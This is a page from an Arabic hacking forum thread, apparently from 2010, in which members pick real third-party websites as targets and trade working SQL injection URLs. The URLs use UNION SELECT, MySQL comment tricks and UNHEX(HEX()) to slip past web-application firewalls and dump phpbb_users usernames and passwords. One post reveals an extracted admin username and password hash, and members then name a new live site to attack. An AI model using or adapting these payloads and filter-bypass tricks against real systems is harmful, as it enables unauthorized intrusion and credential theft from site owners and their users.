:: vBspiders Professional Network ::
صفحة 4 من 27 « الأولى 23 4 5614 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/showthread.php?t=39268)

aircrack -ng 12-10-2010 05:44 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265725)
استطعت حقن الموقع لكني لم اوفق في استخراج اسم الادمن والباسوورد :a43:
تسلم يابطل حاول مرة اخرى وركز وراح تجيبه

Victors 12-10-2010 03:33 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 265754)
تسلم يابطل حاول مرة اخرى وركز وراح تجيبه

المشكله انو الجداول والاعمدة اللي اخمنها وتطلع صح تكون فاضية مافيها بيانات :(

aircrack -ng 12-10-2010 04:08 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265885)
المشكله انو الجداول والاعمدة اللي اخمنها وتطلع صح تكون فاضية مافيها بيانات :(
هلا حبيبي
لاتخمن هالموقع الاصدار الخامس
ركز فقط اخي بعرف انك راح تجيبه
كل التحية لك اخي على المجهود

darkman.dz 12-10-2010 04:59 PM
[QUOTE=عبد الصمد;265706]
اقتباس:
المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 265643)
أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/
و لم تنفع معي
هل إستخدمت طريقة جديدة في تخطي الفوربدن 403[/
السلام عليكم وليد بلادي
تعرف هذا الموقع فيه خاصية عجباني تستخدم تقريبا كل طرق وايضا هذا الموقع مانع عدة اوامر
وانا تخطيت الفوريدن مش ب union ب select وايضا لما راح تتخطى هالشيء راح يكون فيه مشكل اخر وايضا فيه مشكل اخر الحقنة بس لو تركز شوي راح تتخطاهم
اذا لم يحقنه اي واحد راح ارفع الشرح فيديو
أرجو أن لا تكون قد إستعملت الفلترة لأني لم أجربها ........و أنقتها مقتا شديدا
أنا لما أصادف موقع يحتاج لفلترة أمر عليه مرور الكرام ولا أحاول معه لأني أكرهها

aircrack -ng 12-10-2010 07:07 PM
اوكي اخي راح احط الحقنة
كود:

http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,UNHEX(HEX(/*!concat*/(username,0x3a,user_password))),5,6,7,8,9,10,11,12+from+phpbb_users --
الاستعلام
كود:
/*!select*/
الموفع مانع كلمة
concat
التخطي ب
كود:
/*!concat*/
الموقع مانع
group_
الاستعلام ب
limit
مشكل اخر الحقنة والتخطي ب
UNHEX

اليوزر admin
الباس 21232f297a57a5a743894a0e4a801fc3
اتمنى انو تكون وصلة الفكرة
ومشكور مشرفنا الغالي على المجهود
اخوك عبد الصمد

Victors 12-10-2010 08:34 PM
اخوي لما انفذ حقنك هذا اللي يظهر لي

Anonymous:

نفس اللي كان يطلع معي

مع العلم انو حقني كان بدون UNHEX(HEX(

Victors 12-10-2010 08:47 PM
زبط معي بعد اضافة limit 1,1 بالاخير

وانا كنت اكتب limit 0,10 ويطلع لي سجل واحد بس الاول

يعني شكل الحقن بيكون
كود:
http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,/*!concat*/(username,0x3a,user_password),5,6,7,8,9,10,11,12 from phpbb_users limit 1,1 --

agentsimo 12-10-2010 09:17 PM
السلام عليكم هل من هدف جديد ??

aircrack -ng 12-11-2010 12:27 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة Victors (المشاركة 265987)
اخوي لما انفذ حقنك هذا اللي يظهر لي

Anonymous:

نفس اللي كان يطلع معي

مع العلم انو حقني كان بدون UNHEX(HEX(
هلا اخي
انا قلتلك لازم تركز
ضع حقنتي ونزل لتحت الصفحة راح تلاقي اليوزر والباس
اخي لازم تركز جيدا وانا كنت عارف انك راح تجيبه بس انت ماكنت مركز
هالموفع مانع كلمة group_
بس يطلع كل الجداول واليوزرات والباسوردات مرة وحدة
ولما تستعمل الامر limit
هالامر منشان طلع جداول اخرى اذا اطلعتش المرة الاولى
فهمت علي اخي

إسلام العالم 12-11-2010 10:56 AM
[align=center]بارك الله فيكم غرفة رائعة
سوف أكون معكم إن شاءا لله
هل من هدف جديد؟؟؟؟؟[/align]

darkman.dz 12-11-2010 02:01 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 265956)
اوكي اخي راح احط الحقنة
كود:

http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,UNHEX(HEX(/*!concat*/(username,0x3a,user_password))),5,6,7,8,9,10,11,12+from+phpbb_users --
الاستعلام
كود:
/*!select*/
الموفع مانع كلمة
concat
التخطي ب
كود:
/*!concat*/
الموقع مانع
group_
الاستعلام ب
limit
مشكل اخر الحقنة والتخطي ب
UNHEX

اليوزر admin
الباس 21232f297a57a5a743894a0e4a801fc3
اتمنى انو تكون وصلة الفكرة
ومشكور مشرفنا الغالي على المجهود
اخوك عبد الصمد
شكرا أخي عبد الصمد
أنا أعرف طرقة التخطي /*!SELECT*/
لكن أنا أعرفها بالنسبة لل forbidden 406
لم أكن أعلم أن هاته الطريقة تنفع في forbidden 404
هههههههههههه
شكرا على هاته المعلومة الجديدة
smilies15
smilies14
:a07:

aircrack -ng 12-11-2010 07:19 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 266444)
شكرا أخي عبد الصمد
أنا أعرف طرقة التخطي /*!SELECT*/
لكن أنا أعرفها بالنسبة لل forbidden 406
لم أكن أعلم أن هاته الطريقة تنفع في forbidden 404
هههههههههههه
شكرا على هاته المعلومة الجديدة
smilies15
smilies14
:a07:
مرسي عليك وليد بلادي
وايضا هاذي الغرفة لتبادل الخبرات وتطوير الذات
ربنا يسعدك اخي
كل الاحترام والتقدير لك

aircrack -ng 12-11-2010 10:45 PM
السلام عليكم
الهدف موقع للمغني شيكو لولو ههههههههههه
http://www.northernharbour.com/gallery.php?id=5

بالتوفيق شباب

darkman.dz 12-11-2010 10:49 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 266562)
مرسي عليك وليد بلادي
وايضا هاذي الغرفة لتبادل الخبرات وتطوير الذات
ربنا يسعدك اخي
كل الاحترام والتقدير لك
تعجبوني يا ولاد لبلاد + الإحترام متبادل + جاري مع الهدف الجديد

darkman.dz 12-11-2010 11:09 PM
الحقنة وصلت إلى
كود:
http://www.northernharbour.com/gallery.php?id=-5%20/*!union*/%20%20select%201,2,3,/*!concat*/%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns--
هل من إرشادات
لأني جربت ال unhex(hex())
وجربت /*!*/
و مانفعو :)


الساعة الآن 09:09 PM
صفحة 4 من 27 « الأولى 23 4 5614 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0